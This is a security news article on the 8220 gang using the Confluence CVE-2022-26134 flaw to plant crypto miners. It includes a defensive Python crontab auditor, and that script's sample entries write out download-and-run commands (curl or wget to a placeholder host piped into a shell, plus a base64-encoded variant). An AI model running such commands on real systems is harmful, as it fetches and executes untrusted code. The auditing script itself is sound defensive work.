Among the many threat actors exploiting the Confluence zero-day bug, CheckPoint researchers have noted a group called 8220 gang that is installing crypto miners to mine cryptocurrency.

The group targets both Linux and Windows machines with its mining malware, which exhausts all the resources of vulnerable Confluence servers until it is removed. To prevent this, Atlassian, the maker of Confluence, has advised users to apply the patch that was made available a week ago.

Exploiting Confluence Zero-Day Bug

Late last month, researchers found a new zero-day security vulnerability in Atlassian’s Confluence, a collaboration tool used by companies to manage work and communications. The bug is tracked as CVE-2022-26134, and several proof-of-concept exploits for it were released soon after.

This led many threat actors to prey on vulnerable Confluence servers around the world, with most creating new admin accounts, installing web shells, and executing remote commands to ultimately take control of the exploited servers.

Researchers at CheckPoint, however, have spotted another threat actor, named “8220 gang”, that has been exploiting this bug to mine cryptocurrency. According to their note, the group starts its campaign by sending a specially crafted HTTP request to the vulnerable Confluence server, whether it runs Linux or Windows.

This request exploits the bug to drop a base64-encoded payload, which in turn fetches an executable: a malware dropper script on Linux and a child process spawner on Windows. In both cases, these executables aim to achieve persistence across reboots through cron jobs or startup folders.
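A defender can audit crontab entries for the cron-based persistence described above. The following Python is an added example, not code from CheckPoint or from this article; the patterns, function names and sample entries are assumptions constructed for illustration.

```python
import base64
import re

# Heuristics: a cron entry that downloads code or decodes base64 and hands it to a shell.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
B64_EXEC = re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(ba)?sh\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_blobs(line):
    """Decode base64-looking tokens; keep only those that are valid UTF-8."""
    decoded = []
    for blob in B64_BLOB.findall(line):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except ValueError:  # bad padding or alphabet, or not text
            continue
    return decoded

def audit_cron(lines):
    """Return (line, reasons) for every cron entry that looks like a dropper."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if FETCH_EXEC.search(line):
            reasons.append("download piped to shell")
        if B64_EXEC.search(line):
            reasons.append("base64 decode piped to shell")
        if any(FETCH_EXEC.search(text) for text in decode_blobs(line)):
            reasons.append("blob decodes to download-and-run")
        if reasons:
            findings.append((line, reasons))
    return findings

# Constructed sample entries (placeholder host, not real indicators).
BLOB = base64.b64encode(b"curl -fsSL http://example.invalid/a.sh | sh").decode()
SAMPLE = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/5 * * * * curl -fsSL http://example.invalid/a.sh | sh",
    f"@reboot echo {BLOB} | base64 -d | sh",
    "*/10 * * * * wget -q -O- http://example.invalid/b | bash >/dev/null 2>&1",
]

if __name__ == "__main__":
    for entry, why in audit_cron(SAMPLE):
        print(f"{'; '.join(why):55} {entry}")
```

On a real host, feed it the output of `crontab -l` for each user along with the files under `/etc/cron.d`; a hit is a lead for review, not proof of compromise.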

They also uninstall all the running agents and then activate the miner to start the mining process. Cryptomining in the long term (or in the short term, if it is aggressive enough) results in faster hardware wear-down, reduced server performance, and even business stoppage.

Finally, the Linux script is also said to look for SSH keys to hijack in order to pool other systems in the network. Aside from this, a few other Linux botnets such as Kinsing, Hezb, and Dark.IoT are also exploiting this zero-day bug to deploy backdoors and crypto miners, researchers say.

To prevent this, Atlassian, the developer of the affected Confluence suite, released a patch on June 3rd, 2022, and advised users to apply it as soon as possible.

